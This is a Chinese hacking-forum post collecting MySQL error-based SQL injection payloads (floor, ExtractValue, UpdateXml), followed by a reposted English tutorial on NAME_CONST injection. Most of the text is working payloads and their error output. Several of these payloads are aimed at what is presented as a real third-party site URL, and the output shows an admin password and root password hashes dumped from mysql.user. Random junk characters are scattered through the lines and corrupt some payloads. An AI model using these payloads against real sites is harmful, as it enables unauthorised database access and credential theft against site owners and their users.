找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3149|回复: 0
打印 上一主题 下一主题

mysql ,floor,ExtractValue,UpdateXml三种报错模式注入利用方法

[复制链接]
跳转到指定楼层
楼主
发表于 2015-11-11 19:03:37 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

1、通过floor报错

可以通过如下一些利用代码

and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

and (select count(*) from (select 1 union   select null union   select  !1)x group by concat((select table_name from information_schema.tables  limit 1),floor(rand(0)*2)));

举例如下:6 d- Z# j- w5 {- Z
首先进行正常查询:

mysql> select * from article where id = 1;9 S% Y5 {9 S7 ]6 P& f$ ?
+—-+——-+———+0 i& B; G+ g/ D6 C6 u
| id | title | content |3 u8 g4 G: {% i) P% {8 Y; r& K5 v
+—-+——-+———+
5 X, ~- P8 M% o: B0 }. Z|  1 | test  | do it   |* M" g' X  X3 h# D
+—-+——-+———+

假如id输入存在注入的话,可以通过如下语句进行报错。

mysql> select * from article where id = 1 and (select 1 from  (select count(*),concat(version(),floor(rand(0)*2))x from  information_schema.tables group by x)a);7 A# T, p3 |# d8 m1 K' g
ERROR 1062 (23000): Duplicate entry ’5.1.33-community-log1′ for key ’group_key’

可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。7 Y, o# R6 F, q6 w3 Z* `
例如我们需要查询管理员用户名和密码:

Method1:

mysql> select * from article where id = 1 and (select 1 from  (select count(*),concat((select pass from admin where id  =1),floor(rand(0)*2))x from information_schema.tables group by x)a);
+ i* w. ]7 a  v& MERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’

Method2:

mysql> select * from article where id = 1 and (select count(*)  from (select 1 union   select null union   select !1)x group by  concat((select pass from admin limit 1),floor(rand(0)*2)));1 {" Z2 a; Z: Q! e/ P1 J3 v7 j- }
ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’

2、ExtractValue; _& R* m+ j7 U( s$ l$ d
测试语句如下

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

实际测试过程

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));–& A3 {3 G, `! y* `: _- M7 w
ERROR 1105 (HY000): XPATH syntax error: ’\admin888′

3、UpdateXml

测试语句

and 1=(updatexml(1,concat(0x3a,(select user())),1))

实际测试过程

mysql> select * from article where id = 1 and 1=(updatexml(0x3a,concat(1,(select user())),1))ERROR 1105 (HY000): XPATH syntax error: ’:root@localhost’

( x% t' f9 Y! P, _) H* I0 P4 y
. q$ u$ B+ u+ R; Z' A2 k( o

再收集:

; {* m% I) b- ]
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)
& O0 R; `: x. |# U& B6 Y' s3 j3 Q3 s2 e. |
Erroruplicate column name ‘5.0.27-community-nt’Erroruplicate column name ‘5.0.27-community-nt’$ ]  W) y. M7 u

% g# m  v( P' u0 p) W3 Bhttp://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)
0 H& e+ e' ~, z+ _+ B* A
6 G" s  s5 P! p9 k# qErroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′ 3 C% d* D) |5 V7 B# _( o0 z
6 G- [1 |1 }% F7 D4 w: @! M1 f* p
MYSQL高版本报错注入技巧-利用NAME_CONST注入# `, w. X: E  P7 ^5 c% W- ]
It's been a while since I've made an SQL Injection tutorial, so I'd thought I should make a new tutorial using the method name_const. There's not many papers documenting this method, so it feels kind of good to be the one to make a guide for it.
* k6 n, o$ o, L1 I- K0 g  a: }$ p" I( ~* o0 N  s; u4 i% @

2 j7 \5 O* T  e$ v" ^相关信息+ j: T. @6 W! G4 E( h; H) Z/ C% e8 S; ]
/ L7 @) E; i: q; [6 O
NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.
/ B) z& y' Z7 h2 m/ d
3 K* F9 Z, v6 BCode:; P2 L% ^% M1 z0 M0 I- X8 l0 i8 v
NAME_CONST(DATA, VALUE)
% U7 k. }% \0 l, ?8 C( N' o( P# D0 L: V, x
Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.6 ]- q! v8 e# L" w

2 N5 s5 f3 w+ h5 `" iSELECT NAME_CONST('TEST', 1): [# H! o; F# \4 K" l

" S3 H( A2 Y& G( t
" q, f# t: V! c# S* H
* V) r9 ?. `/ l, k|---------------|6 e2 F/ y3 U! i2 A1 w
|     TEST      |
8 }8 R% y+ S% N/ S7 t: e|               |+ j7 G9 m" m5 A/ t  L$ h
|---------------|
6 `, V, Z6 f0 A. }2 z' n|       1       |, Q/ G6 @( j+ Q
|               |
) V( T$ v0 R% W9 a|---------------|
/ ]' D. t2 v+ P+ s% O

2 ]" S. v& i" c' M0 i
1 u) L# ]$ H8 W5 h. W6 z! d, [
3 j: c6 R" B% o8 M2 r( I: s/ m0 k) u: J. {8 f) t
http://dev.mysql.com/doc/refman/5.0/en/m...name-const
5 J/ s7 x1 B. j' {) E+ ?% FIntro to MySQL Variables
' U/ L0 B. I) a2 K% b0 {# I7 P0 C# u9 A0 t
Once you've got your vulnerable site, lets try getting some MySQL system variables using NAME_CONST.
4 c5 N% v! A; O- U) Q: C$ k+ L0 n: w/ K; h: `) `
Code:
( I, V8 ~) w  Z( B$ J& v4 r% Xhttp://www.baido.hk/qcwh/content ... ;sid=19&cid=261
, C1 u* j# a  a4 R; y: e! b4 ~3 F% v+ @' S
. C5 ?  Y6 g, l# M- j- C% X

% s8 M4 \" |7 ]! G( n; o

* |7 A  t) k# \  G
. Q% J7 C  @( |5 e( @8 B9 nCode:" a2 m1 H5 k% B$ v& l" q1 \7 n0 ?( `
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--4 j$ F" q* z: t4 s' L/ a; Q
4 B+ {4 t2 `% Y! D% a

0 W3 G" W5 p6 _  k0 d8 G( jVAR = Your MySQL variable.8 |! V* t% e+ `7 P
( W. n$ b# f! a: v* c4 ]
MySQL 5.1.3 Server System Variables
  s8 u6 Y8 Z+ t' d& c+ n. i; L( x
' S; w2 u$ @, g) W. XLet's try it out on my site..' u  b& s; Q& w% l) ?* q

, V8 y! `5 N) H7 T8 yCode:
$ q, o( ]4 x) p6 y! X* Khttp://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--
6 K% Q9 t  i4 u+ K
+ W- ]6 f3 K' hErroruplicate column name '5.0.27-community-nt'
# ?( l% T+ @2 p: d% x8 k
: u8 o% e6 N7 V9 e0 e% _
- A+ X8 z' W, y  F( c2 Z
/ b& e+ b! S: m6 z- f5 p

6 `0 d! W+ M# e+ {. r- a7 A1 `& V' n# B! Q9 W8 Y
Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, just wouldn't work there. Luckily, they work here so let's get this going again...- s6 L- G7 Z' |2 A* u7 M' `
) T# N  x/ k4 J* K
Data Extraction$ U1 q# U) {6 ]2 S" |. S: s
* O) D3 w0 }  h
Code:
) m# |3 t* ?: ?& U+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--* E0 k% x2 q2 Z& c* s0 M

  }* U: F1 }2 E5 V4 }2 V+ O8 {. J; X2 K  p9 @  a# \
We should get a duplicate column 1 error...
% P4 ?. i9 c  w) l$ `- E) |, \% E+ O- @& d/ s
Code:/ o8 d6 T" R1 o1 n- D4 z' x
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--" Q: ^/ M% }- n

; Z3 O7 @2 R/ n/ B3 c8 {7 BErroruplicate column name '1( W: n6 U: S$ L( x; z4 A: e! R" e

& U9 k/ F; _- u8 ]. Z3 i7 y2 l/ d/ U# `1 V8 K- u2 Y9 u/ M/ f
* W$ g1 {9 F( f6 v5 M

% L9 b" j. `, w- r/ m+ @* {
( P: Z. {  C+ Y/ L7 g0 ]

3 O- q# ~$ U6 g% G, @( C- n0 ?/ C/ L- aNow let's get the tables out this bitch..9 |; g5 @6 w; L3 Y! E) r

4 N- W+ {' V. R/ G# K) bCode:8 Z4 \( ?3 r7 Z9 _$ D' U
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--
0 n9 z. a. ?8 J; I- ?7 `) @% L' b

. B0 n! u6 X( R' r( e; i$ ^1 N! W4 c5 y. G. N- a
Let's see if it works here, if it does, we can go on and finish the job.
  ^6 ~2 G# p0 r  R: g8 w
, u2 ]3 C: Q: N' V+ d- _, _Code:
6 c. b! V# I2 y2 ~- @, qhttp://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--
# E3 D( F3 j! V+ t2 d
. P/ N+ S& X5 r, k7 a8 Y" S+ ^( m: e
Erroruplicate column name 'com_admanage+ r7 O$ _) c3 Q2 p0 i
  [: u9 h. k" J4 _7 y# i2 K

0 k, {0 V' G$ t! h+ k/ o/ X" Y
+ |; ^3 _$ Y, v4 m/ Y0 [0 D# I# M2 D8 o, d3 W; ~9 B' H; ?3 q9 ]

$ i% k8 ^- \- ?3 @; }( u- o  L& d- w8 r( }* m" N
Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.
( h9 k: A; |2 |; u/ M2 a
" ~* \- G* k2 ~$ B5 x- T$ ^) dLet's get the columns out of the user table..
& z2 M5 n1 r7 l3 v: J8 Y3 _5 [9 C, k3 C& y" r4 q
Code:4 X) s: _+ Z+ [& k
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--/ D0 C1 F% l/ `8 v2 b% c8 H6 E
) a$ k& ]1 S% I1 X& P
& O3 n$ V( X& v9 f% a0 q
So mine looks like this, and I get the duplicate column name 'Host'." `8 w* c, j8 B0 ~6 k' A
. \) Q3 O# j# o+ m  u, c
Code:
' y6 ?$ u# i/ w/ r' zhttp://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--
/ ]# p! s: U/ H' s( V
' r5 f" S% U0 U' M( z  CErroruplicate column name 'Host'
- S6 T1 \# }+ S) k
* p. F0 E/ V. `9 Z' ^# I. i
  E- ]7 ~9 {5 V! _: O( l
  }4 d( |- t- r( s* k4 m. H4 Z' v  _) h

# O/ S! _* [& I

' @3 a9 b% ?& y) ~- i8 l
. B! a# N( [3 \: e- ~' s0 a7 ?Woot, time to finish this bitch off.
1 u. P" y' \: ]1 J. y/ u" q4 ~
- Y" z- k' Z; ?# _4 i; RCode:4 U& O  t* i/ H) P2 q1 t. k! w8 F
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--
$ V) Y. P/ k8 R1 k9 t
+ F! }4 d3 y! Y
, e( f$ W( Y; ?3 _+ K4 o- C9 H
So mine looks like this...) E' I2 W0 J' j5 z# _. e
& {8 m0 C7 Y# \( O
Code:
# F3 J* x+ b7 S" A2 p) Khttp://www.baido.hk /qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--
) s. A8 ^4 j& M. r$ x/ c' i& d& b( ^2 z- @" x( F
Erroruplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'+ b( K, h. t9 B( m
) K% ?; ^" t1 w. I3 t

; \8 G7 o. a! W$ O  ~0 Y9 t
& \$ ^2 R. M+ }6 J. G) v9 x" Y) E0 z* O# b

- M* s6 C0 E6 `* N9 W
+ O; K& W, ]) O( D  K& x2 a# BAnd there we have it, thanks for reading.

8 F# \0 o' o4 n2 p4 R+ h2 B9 u- P) z* J$ C* n% F
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表